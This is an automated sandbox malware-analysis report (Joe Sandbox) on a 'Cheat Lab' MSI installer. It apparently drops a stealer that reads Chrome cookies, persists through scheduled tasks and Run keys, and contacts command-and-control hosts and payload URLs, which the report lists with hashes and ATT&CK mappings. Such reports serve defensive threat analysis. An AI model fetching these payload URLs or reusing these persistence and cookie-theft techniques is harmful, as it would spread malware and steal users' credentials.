                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: Yara match | File source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2133528800.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: connect.exe PID: 4584, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 22.2.connect.exe.460000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000016.00000002.2131526170.000000000040D000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2131675948.0000000000462000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: connect.exe PID: 4584, type: MEMORYSTR
                    Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: Windows Management Instrumentation (221); Scripting (1); Native API (3); Command and Scripting Interpreter (3); Scheduled Task/Job (1); PowerShell (1); Scheduled Task; Command and Scripting Interpreter; PowerShell
                    Persistence: DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                    Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                    Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Scripting (1); Obfuscated Files or Information (3); DLL Side-Loading (1); File Deletion (1); Masquerading (123); Virtualization/Sandbox Evasion (241); Process Injection (11)
                    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: System Time Discovery (2); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (135); Security Software Discovery (251); Virtualization/Sandbox Evasion (241); Process Discovery (2); Application Window Discovery (1); System Network Configuration Discovery (1)
                    Lateral Movement: Replication Through Removable Media (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                    Collection: Archive Collected Data (1); Data from Local System (2); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
                    [Behavior graph] Behavior Graph ID: 1337697, Sample: Cheat.Lab.2.7.2.msi, Startdate: 06/11/2023, Architecture: WINDOWS, Score: 60

                    Source | Detection | Scanner | Label | Link
                    Cheat.Lab.2.7.2.msi | 3% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    cdn.discordapp.com | 162.159.135.233 | true | false | | high
                    ip-api.com | 208.95.112.1 | true | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    https://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt | false | | high
                    91.103.252.48:33597 | true | Avira URL Cloud: malware | unknown
                    http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt | false | | high
                    http://ip-api.com/json/?fields=query,status,countryCode,city,timezone | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                                          http://tempuri.org/Entity/Id2Responseconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id21Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id9connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id8connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://193.37.71.112/LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://tempuri.org/Entity/Id5connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepareconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id4connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://tempuri.org/Entity/Id7connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://tempuri.org/Entity/Id6connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Entity/Id19Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://luajit.org/LuaJIT.exe.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Mso8LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2MsgLuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://tempuri.org/Entity/Id15Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txtyLuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newconnect.exefalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Entity/Id6Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://api.ip.sb/ipconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2004/04/scconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id1ResponseDconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://tempuri.org/Entity/Id9Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id20connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://tempuri.org/Entity/Id21connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://tempuri.org/Entity/Id22connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id23connect.exe, 00000016.00000002.2133528800.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id24connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issueconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://tempuri.org/Entity/Id24Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.ecosia.org/newtab/connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id1Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressingconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issueconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.advancedinstaller.comCheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtconnect.exefalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id11connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id12connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://tempuri.org/Entity/Id16Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id13connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id14connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id15connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id16connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
91.103.252.48 | unknown | Russian Federation | 202306 | HOSTGLOBALPLUS-ASRU | true
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
193.37.71.112 | unknown | Russian Federation | 202723 | VAD-SRL-AS1MD | false
                                                                                                                                      Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                      Analysis ID:1337697
                                                                                                                                      Start date and time:2023-11-06 15:34:05 +01:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 10m 56s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:27
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample file name:Cheat.Lab.2.7.2.msi
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal60.troj.spyw.evad.winMSI@30/50@2/4
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                      • Number of executed functions: 105
                                                                                                                                      • Number of non-executed functions: 207
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .msi
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.216.81.152
                                                                                                                                      • Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                      • Execution Graph export aborted for target LuaJIT.exe, PID 4128 because there are no executed function
                                                                                                                                      • Execution Graph export aborted for target LuaJIT.exe, PID 6136 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • VT rate limit hit for: Cheat.Lab.2.7.2.msi
Time | Type | Description
15:35:03 | Task Scheduler | Run new task: CheatLabUpdateTask path: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe s>"C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"
15:35:03 | API Interceptor | 15x Sleep call for process: powershell.exe modified
15:35:11 | Task Scheduler | Run new task: NotepadUpdateTask_NzEz path: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe s>C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
15:35:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"
15:35:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua"
15:36:09 | API Interceptor | 24x Sleep call for process: connect.exe modified
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      VakifBankKrediKartiHesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      Uykndrdm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      Porland_Sipari#U015f_Listesi_03.11.2023.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 162.159.133.233
                                                                                                                                      Uykndrdm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.133.233
                                                                                                                                      zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.135.233
                                                                                                                                      Ithojli.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      zGoujUMwYp.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.130.233
                                                                                                                                      231005-001-ba.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Ithojli.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.134.233
                                                                                                                                      REVISED_DOCUMENTS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
                                                                                                                                      Gqriesvfi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 162.159.129.233
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):193279
Entropy (8bit):6.413806532969242
Encrypted:false
SSDEEP:3072:zM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiX:zBKwXYBWHRuEFW9RzLLhrUmdHDZ19MhC
MD5:5351DE8A958D3FD5D70FAD2676621A63
SHA1:1C6FCD99023E0BD95F22A5F789344AF67EE66AD8
SHA-256:0982DDF4AE98754C69587A19FEB3E95453C62E6380BAB3B34533D4F47FA3A9F0
SHA-512:021CEED612212F15773C10A7EF2AC7DB54463C3F8C6C3CBE89F2CD04A17013139874F337663EB6780B491AC03BC339C528A98AD9C397ECE4F6735B5308012D68
Malicious:false
Preview:...@IXOS.@.....@b|fW.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{3C7A1E44-AA05-4B3F-B2A1-48DCB7D1B307}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1159168
                                                                                                                                                                      Entropy (8bit):6.056000673170944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                                                                                                                                      MD5:9CB9E0D0975E51A90BDED2B3BE8FACA9
                                                                                                                                                                      SHA1:BEF96A36BA40446FBE5596D50BBC9E9ADC154D3B
                                                                                                                                                                      SHA-256:345911E89D241BC814827AEAB2F59004AF713BD088098634440EFF1B237DAF3D
